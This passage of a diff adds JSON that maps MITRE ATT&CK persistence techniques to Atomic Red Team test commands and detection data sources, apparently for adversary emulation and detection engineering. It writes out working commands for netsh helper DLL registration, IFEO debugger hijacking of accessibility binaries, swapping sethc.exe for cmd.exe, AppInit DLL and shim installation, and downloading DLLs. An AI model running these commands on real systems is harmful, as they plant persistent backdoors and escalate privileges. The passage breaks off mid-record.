"target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.007", + "command_list": [ + "netsh.exe add helper C:\\Path\\file.dll\n" + ], + "commands": [ + { + "command": "netsh.exe add helper C:\\Path\\file.dll\n", + "source": "atomics/T1546.007/T1546.007.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Netsh Helper DLL" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.007", + "display_name": "Event Triggered Execution: Netsh Helper DLL", + "atomic_tests": [ + { + "name": "Netsh Helper DLL Registration", + "auto_generated_guid": "3244697d-5a3a-4dfc-941c-550f69f91a4d", + "description": "Netsh interacts with other operating system components using dynamic-link library (DLL) files\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "helper_file": { + "description": "Path to DLL", + "type": "Path", + "default": "C:\\Path\\file.dll" + } + }, + "executor": { + "command": "netsh.exe add helper #{helper_file}\n", + "name": "command_prompt" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1546.008", + "command_list": [ + "$input_table = \"osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe\".split(\",\")\n$Name = \"Debugger\"\n$Value = \"#{attached_process}\"\nForeach ($item in $input_table){\n $item = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value $Value\n }\n}\n", + "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value = \"C:\\windows\\system32\\cmd.exe\"\nForeach ($item in $input_table){\n $item = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value $Value\n }\n}\n", + "copy C:\\Windows\\System32\\sethc.exe C:\\Windows\\System32\\sethc_backup.exe\ntakeown /F C:\\Windows\\System32\\sethc.exe /A\nicacls C:\\Windows\\System32\\sethc.exe /grant Administrators:F /t\ncopy /Y C:\\Windows\\System32\\cmd.exe C:\\Windows\\System32\\sethc.exe\n" + ], + "commands": [ + { + "command": "$input_table = \"osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe\".split(\",\")\n$Name = \"Debugger\"\n$Value = \"#{attached_process}\"\nForeach ($item in $input_table){\n $item = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value $Value\n }\n}\n", + "source": "atomics/T1546.008/T1546.008.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Accessibility Features" + }, + { + "command": "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value = \"C:\\windows\\system32\\cmd.exe\"\nForeach ($item in $input_table){\n $item = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value $Value\n }\n}\n", + "source": "atomics/T1546.008/T1546.008.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Accessibility Features" + }, + { + "command": "copy C:\\Windows\\System32\\sethc.exe C:\\Windows\\System32\\sethc_backup.exe\ntakeown /F C:\\Windows\\System32\\sethc.exe /A\nicacls C:\\Windows\\System32\\sethc.exe /grant Administrators:F /t\ncopy /Y C:\\Windows\\System32\\cmd.exe C:\\Windows\\System32\\sethc.exe\n", + "source": "atomics/T1546.008/T1546.008.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Accessibility Features" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.008", + "display_name": "Event Triggered Execution: Accessibility Features", + "atomic_tests": [ + { + "name": "Attaches Command Prompt as a Debugger to a List of Target Processes", + "auto_generated_guid": "3309f53e-b22b-4eb6-8fd2-a6cf58b355a9", + "description": "Attaches cmd.exe to a list of processes. Configure your own Input arguments to a different executable or list of executables.\n\nUpon successful execution, powershell will modify the registry and swap osk.exe with cmd.exe.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "parent_list": { + "description": "Comma separated list of system binaries to which you want to attach each #{attached_process}. Default: \"osk.exe\"\n", + "type": "String", + "default": "osk.exe, sethc.exe, utilman.exe, magnify.exe, narrator.exe, DisplaySwitch.exe, atbroker.exe" + }, + "attached_process": { + "description": "Full path to process to attach to target in #{parent_list}. Default: cmd.exe\n", + "type": "Path", + "default": "C:\\windows\\system32\\cmd.exe" + } + }, + "executor": { + "command": "$input_table = \"#{parent_list}\".split(\",\")\n$Name = \"Debugger\"\n$Value = \"#{attached_process}\"\nForeach ($item in $input_table){\n $item = $item.trim()\n $registryPath = \"HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\"\n IF(!(Test-Path $registryPath))\n {\n New-Item -Path $registryPath -Force\n New-ItemProperty -Path $registryPath -Name $name -Value $Value -PropertyType STRING -Force\n }\n ELSE\n {\n New-ItemProperty -Path $registryPath -Name $name -Value $Value\n }\n}\n", + "cleanup_command": "$input_table = \"#{parent_list}\".split(\",\")\nForeach ($item in $input_table)\n{\n $item = $item.trim()\n reg delete \"HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\$item\" /v Debugger /f 2>&1 | Out-Null\n}\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Replace binary of sticky keys", + "auto_generated_guid": "934e90cf-29ca-48b3-863c-411737ad44e3", + "description": "Replace sticky keys binary (sethc.exe) with cmd.exe\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "copy C:\\Windows\\System32\\sethc.exe C:\\Windows\\System32\\sethc_backup.exe\ntakeown /F C:\\Windows\\System32\\sethc.exe /A\nicacls C:\\Windows\\System32\\sethc.exe /grant Administrators:F /t\ncopy /Y C:\\Windows\\System32\\cmd.exe C:\\Windows\\System32\\sethc.exe\n", + "cleanup_command": "copy /Y C:\\Windows\\System32\\sethc_backup.exe C:\\Windows\\System32\\sethc.exe\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1546.010", + "command_list": [ + "reg.exe import PathToAtomicsFolder\\T1546.010\\src\\T1546.010.reg\n", + "reg.exe import #{registry_file}\n" + ], + "commands": [ + { + "command": "reg.exe import PathToAtomicsFolder\\T1546.010\\src\\T1546.010.reg\n", + "source": "atomics/T1546.010/T1546.010.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: AppInit DLLs" + }, + { + "command": "reg.exe import #{registry_file}\n", + "source": "atomics/T1546.010/T1546.010.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: AppInit DLLs" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.010", + "display_name": "Event Triggered Execution: AppInit DLLs", + "atomic_tests": [ + { + "name": "Install AppInit Shim", + "auto_generated_guid": "a58d9386-3080-4242-ab5f-454c16503d18", + "description": "AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. Upon succesfully execution, \nyou will see the message \"The operation completed successfully.\" Each time the DLL is loaded, you will see a message box with a message of \"Install AppInit Shim DLL was called!\" appear.\nThis will happen regularly as your computer starts up various applications and may in fact drive you crazy. A reliable way to make the message box appear and verify the \nAppInit Dlls are loading is to start the notepad application. Be sure to run the cleanup commands afterwards so you don't keep getting message boxes showing up.\n\nNote: If secure boot is enabled, this technique will not work. https://docs.microsoft.com/en-us/windows/win32/dlls/secure-boot-and-appinit-dlls\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "registry_file": { + "description": "Windows Registry File", + "type": "Path", + "default": "PathToAtomicsFolder\\T1546.010\\src\\T1546.010.reg" + }, + "registry_cleanup_file": { + "description": "Windows Registry File", + "type": "Path", + "default": "PathToAtomicsFolder\\T1546.010\\src\\T1546.010-cleanup.reg" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Reg files must exist on disk at specified locations (#{registry_file} and #{registry_cleanup_file})\n", + "prereq_command": "if ((Test-Path #{registry_file}) -and (Test-Path #{registry_cleanup_file})) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory (split-path #{registry_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010.reg\" -OutFile \"#{registry_file}\"\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/src/T1546.010-cleanup.reg\" -OutFile \"#{registry_cleanup_file}\"\n" + }, + { + "description": "DLL's must exist in the C:\\Tools directory (T1546.010.dll and T1546.010x86.dll)\n", + "prereq_command": "if ((Test-Path c:\\Tools\\T1546.010.dll) -and (Test-Path c:\\Tools\\T1546.010x86.dll)) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory C:\\Tools -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010.dll\" -OutFile C:\\Tools\\T1546.010.dll\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.010/bin/T1546.010x86.dll\" -OutFile C:\\Tools\\T1546.010x86.dll\n" + } + ], + "executor": { + "command": "reg.exe import #{registry_file}\n", + "cleanup_command": "reg.exe import #{registry_cleanup_file} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ] + ] + }, + { + "technique_id": "T1546.011", + "command_list": [ + "sdbinst.exe PathToAtomicsFolder\\T1546.011\\bin\\AtomicShimx86.sdb\n", + "Copy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb\nCopy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb\n", + "New-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\nNew-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\n" + ], + "commands": [ + { + "command": "sdbinst.exe PathToAtomicsFolder\\T1546.011\\bin\\AtomicShimx86.sdb\n", + "source": "atomics/T1546.011/T1546.011.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Application Shimming" + }, + { + "command": "Copy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\T1546.011CompatDatabase.sdb\nCopy-Item $PathToAtomicsFolder\\T1546.011\\bin\\T1546.011CompatDatabase.sdb C:\\Windows\\apppatch\\Custom\\Custom64\\T1546.011CompatDatabase.sdb\n", + "source": "atomics/T1546.011/T1546.011.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Application Shimming" + }, + { + "command": "New-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\Custom\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\nNew-ItemProperty -Path HKLM:\"\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AppCompatFlags\\InstalledSDB\" -Name \"AtomicRedTeamT1546.011\" -Value \"AtomicRedTeamT1546.011\"\n", + "source": "atomics/T1546.011/T1546.011.yaml", + "name": "Atomic Red Team Test - Event Triggered Execution: Application Shimming" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1546.011", + "display_name": "Event Triggered Execution: Application Shimming", + "atomic_tests": [ + { + "name": "Application Shim Installation", + "auto_generated_guid": "9ab27e22-ee62-4211-962b-d36d9a0e6a18", + "description": "Install a shim database. This technique is used for privilege escalation and bypassing user access control.\nUpon execution, \"Installation of AtomicShim complete.\" will be displayed. To verify the shim behavior, run \nthe AtomicTest.exe from the \\\\T1546.011\\\\bin directory. You should see a message box appear\nwith \"Atomic Shim DLL Test!\" as defined in the AtomicTest.dll. To better understand what is happening, review\nthe source code files is the \\\\T1546.011\\\\src directory.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_path": { + "description": "Path to the shim database file", + "type": "String", + "default": "PathToAtomicsFolder\\T1546.011\\bin\\AtomicShimx86.sdb" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Shim database file must exist on disk at specified location (#{file_path})\n", + "prereq_command": "if (Test-Path #{file_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nNew-Item -Type Directory (split-path #{file_path}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicShimx86.sdb\" -OutFile \"#{file_path}\"\n" + }, + { + "description": "AtomicTest.dll must exist at c:\\Tools\\AtomicTest.dll\n", + "prereq_command": "if (Test-Path c:\\Tools\\AtomicTest.dll) {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path c:\\Tools\\AtomicTest.dll) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.011/bin/AtomicTest.dll\" -OutFile c:\\Tools\\AtomicTest.dll\n" + } + ], + "executor": { + "command": "sdbinst.exe #{file_path}\n", + "cleanup_command": "sdbinst.exe -u #{file_path} >nul 2>&1\n", + "name": "command_prompt", + "elevation_required": true + } + }, + { + "name": "New shim database files created in the default shim database directory", + "auto_generated_guid": "aefd6866-d753-431f-a7a4-215ca7e3f13d", + "description": "Upon execution, check the \"C:\\Windows\\apppatch\\Custom\\\" folder for the new shim 